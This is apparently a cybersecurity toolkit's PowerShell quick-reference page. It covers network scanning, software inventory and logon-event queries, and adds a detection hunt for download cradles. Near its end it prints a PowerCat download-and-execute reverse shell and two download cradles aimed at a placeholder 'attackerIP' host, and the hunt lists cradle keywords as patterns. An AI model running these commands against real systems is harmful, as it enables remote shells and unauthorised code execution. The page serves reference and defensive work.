> For the complete documentation index, see [llms.txt](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/guides/quick-reference/powershell.md).

# PowerShell

Simple **Ping Sweep**

```
2..254 | Foreach-Object { Test-Connection -ComputerName XXX.XXX.XXX.$_}
```

Each host **scans for its neighbours** ($ComputerList in this instance would refer to a variable created to reference a text file with a list of computer names in it)

```powershell
# Multicast (01-00-5E*) and broadcast (FF-FF-...) entries are filtered out of each host's ARP/neighbour table
$Results = Invoke-Command -ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF"} }
```

**Software inventory** list (Can be altered to loop through a list of computers as per above)

```powershell
# Both the native and the 32-bit (WOW6432Node) uninstall hives are needed on 64-bit Windows
@("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty "$_" | Select-Object DisplayName,PSChildName,Publisher,InstallLocation}
```
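The two one-liners above can be combined into a fleet-wide inventory. This is an added example, not part of the original page: it assumes `$ComputerList` is read from a constructed `hosts.txt` (one hostname per line) and writes a CSV that can be diffed against a known-good baseline.

```powershell
# Added example (not from the original page): collect the installed-software list from
# several hosts at once and write it to CSV for diffing against a known baseline.
# hosts.txt is an assumed input file with one computer name per line.
$ComputerList = Get-Content -Path .\hosts.txt

$Inventory = Invoke-Command -ComputerName $ComputerList -ErrorAction SilentlyContinue -ScriptBlock {
    # Both the native and the 32-bit (WOW6432Node) uninstall hives must be read on 64-bit Windows
    $hives = @(
        "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*",
        "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*"
    )
    Get-ItemProperty -Path $hives -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |          # skip keys with no product name (updates, stubs)
        Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation, PSChildName
}

# PSComputerName is added by Invoke-Command, so every row is tagged with its source host
$Inventory |
    Select-Object PSComputerName, DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation, PSChildName |
    Sort-Object PSComputerName, DisplayName |
    Export-Csv -Path .\software-inventory.csv -NoTypeInformation

# Quick triage: products present on only one or two hosts are often the ones worth a look
$Inventory | Group-Object DisplayName | Where-Object Count -le 2 |
    Select-Object Name, Count | Sort-Object Count
```

Run it from a host that has WinRM access to the targets; unreachable hosts are skipped silently because of `-ErrorAction SilentlyContinue`, so compare the set of `PSComputerName` values in the CSV against `hosts.txt` to see which machines did not answer.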

Simple TCP **port scan** (IPv4) (1234..5678 refers to port range)

```powershell
$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
# -InformationLevel Quiet returns only $true/$false, so pair each result with its host and port
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object { [pscustomobject]@{ Host = $ip; Port = $_; Open = (Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet -WarningAction SilentlyContinue) } } }
```

Simple UDP **port scan** (IPv4)

```powershell
$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
# UdpClient.Connect() only sets the default remote endpoint; UDP is connectionless, so a successful
# Connect() does not prove the port is open (a send plus a timed-out receive is needed to infer that)
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object { $UDP = New-Object System.Net.Sockets.UdpClient; $UDP.Connect($ip, $_); $UDP.Close() } }
```

Search for **string in file recursively** through folders and provide path of file

```
Get-ChildItem -Recurse | Select-String "dummy" -List | Select Path
```

Get Windows **security events** and group by ID count

```
Get-Winevent -LogName Security | Group-Object -Property Id -NoElement
```

Display all **successful logons** within 24 hours and provide usernames (Ensure TargetWorkstation variable exists)

```
Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation 
```

Active Directory - Search for **last logon date** of specified user

```powershell
Get-ADUser -Identity username -Properties "LastLogonDate"
```

Find all local users who have **logged in** during the last 10 days (adjust (-10) to change days)

```powershell
Get-LocalUser | Where-Object {$_.LastLogon -ge (Get-Date).AddDays(-10)} | Select-Object Name,Enabled,SID,LastLogon | Format-List
```

Method for discovering accounts **logged into the most systems** across the network by count (Ensure Workstations variable exists)

```powershell
# Keep Count (and the source host) in the local output so the final sort has something to work on
Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object | Sort-Object -Property Count -Descending} -ComputerName $Workstations | Select-Object -Property PSComputerName,Name,Count | Sort-Object -Property Count -Descending
```
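The two 4624 one-liners above rely on `Data[5]` being `TargetUserName`, which holds for 4624 but breaks silently if the index is wrong for another event. The following added example (not from the original page) reads the EventData fields by name, drops machine-account and SYSTEM noise, and ranks accounts by the number of distinct hosts they logged on to in the last 24 hours. It assumes `$Workstations` is read from a constructed `hosts.txt`.

```powershell
# Added example (not from the original page): parse 4624 events by field name instead of
# positional Data[5], drop machine/system noise, and rank accounts by how many distinct
# hosts they have logged on to. hosts.txt is an assumed input file, one name per line.
$Workstations = Get-Content -Path .\hosts.txt

$Logons = Invoke-Command -ComputerName $Workstations -ErrorAction SilentlyContinue -ScriptBlock {
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-1) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        # Build a name->value map of the EventData fields so the order of <Data> elements does not matter
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            User      = $d['TargetUserName']
            Domain    = $d['TargetDomainName']
            LogonType = [int]$d['LogonType']
            SourceIP  = $d['IpAddress']
        }
    } | Where-Object {
        $_.User -notmatch '\$$' -and                     # computer accounts end in $
        $_.User -notin @('SYSTEM', 'ANONYMOUS LOGON') -and
        $_.LogonType -in @(2, 3, 10)                     # interactive, network, remote interactive
    }
}

# Count distinct hosts per account; PSComputerName is added to each object by Invoke-Command
$Logons |
    Group-Object User |
    ForEach-Object {
        [pscustomobject]@{
            User    = $_.Name
            Systems = ($_.Group.PSComputerName | Sort-Object -Unique).Count
            Logons  = $_.Count
            Sources = ($_.Group.SourceIP | Sort-Object -Unique) -join ','
        }
    } |
    Sort-Object Systems, Logons -Descending |
    Format-Table -AutoSize
```

The `Systems` column is what the "logged into the most systems" question actually asks for; `Logons` is the raw event count, which a single noisy host can inflate. Widen `StartTime` for a longer baseline, and keep logon type 3 in the filter if you want to see service and share access as well as console sessions.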

Detect **randomness of filename**s within given directory. (See also, [Security Tools List](/dts-cybersecurity-tool-kit/tools-list/security-tools-list.md) for the Freq-PS script required for this command). Method for finding malicious files with random names.

```powershell
. C:\Scripts\freq.ps1 # Location of freq.ps1 script
Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique
```
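When Freq-PS is not available, Shannon entropy of the base name gives a cruder but dependency-free signal for the same problem. This is an added example, not part of the original page or of Freq-PS: `$Directory`, the 3.5-bit threshold and the 8-character minimum are assumptions to tune for your environment.

```powershell
# Added example (not from the original page): a dependency-free fallback for spotting
# random-looking file names using Shannon entropy of the base name. The 3.5 threshold and
# the 8-character minimum are assumptions; short names score low whatever they contain.
function Get-NameEntropy {
    param([Parameter(Mandatory)][string]$Name)
    $chars = $Name.ToLowerInvariant().ToCharArray()
    if ($chars.Count -eq 0) { return 0 }
    # Count each character, then sum -p*log2(p) over the distribution
    $counts = @{}
    foreach ($c in $chars) { $counts[$c] = 1 + [int]$counts[$c] }
    $h = 0.0
    foreach ($n in $counts.Values) {
        $p = $n / $chars.Count
        $h -= $p * [Math]::Log($p, 2)
    }
    return [Math]::Round($h, 3)
}

$Directory = 'C:\Windows\Temp'   # assumed starting point; change to the folder under review

Get-ChildItem -Path $Directory -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Name     = $_.Name
            Entropy  = Get-NameEntropy -Name $_.BaseName
            Length   = $_.BaseName.Length
            FullName = $_.FullName
        }
    } |
    Where-Object { $_.Entropy -ge 3.5 -and $_.Length -ge 8 } |
    Sort-Object Entropy -Descending
```

Entropy only measures how evenly characters are spread, so a long name made of real words can still score high; Freq-PS scores character pairs against English, which is why the original command is the better tool when the script is available.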

Downloading **PowerCat** from GitHub, then using it to open a connection to a remote server

```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c <REMOTEIP> -p <REMOTEPORT> -e powershell
```

The following will download and store a remote file to disk.

```
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"
```

The following will download and automatically execute the remote PowerShell script when run from a command prompt.

```powershell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')"
```
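The three download cradles above are exactly what PowerShell script block logging records. The following added example (not from the original page) hunts for them in the last week of Event ID 4104 entries in `Microsoft-Windows-PowerShell/Operational`; the pattern list is an assumption for illustration, and script block logging must be enabled on the host being checked.

```powershell
# Added example (not from the original page): hunt for download-and-execute cradles in
# PowerShell script block logs (Event ID 4104, Microsoft-Windows-PowerShell/Operational).
# Requires "Turn on PowerShell Script Block Logging" to be enabled on the host being checked.
# The regex list is an assumption for illustration; tune it to your environment.
$CradlePatterns = @(
    'DownloadString',
    'DownloadFile',
    'Invoke-WebRequest',
    'Net\.WebClient',
    'Invoke-Expression',
    '\bIEX\b',
    'FromBase64String'
)
$Pattern = ($CradlePatterns -join '|')

$Hits = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        # Pick fields by name; ScriptBlockText is the logged code, Path the script file if there was one
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['ScriptBlockText'] -match $Pattern) {
            $text = $d['ScriptBlockText'] -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Host    = $_.MachineName
                UserSid = $_.UserId
                Path    = $d['Path']
                Snippet = $text.Substring(0, [Math]::Min(160, $text.Length))
            }
        }
    }

$Hits | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Expect one self-match: the hunt script itself contains the pattern strings and is logged as a 4104 event when it runs, so filter on `Path` or on the time of your own session. Entries with an empty `Path` are code that was typed interactively or passed on a command line, as in the `powershell.exe "IEX ..."` form above, which is the more interesting case.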

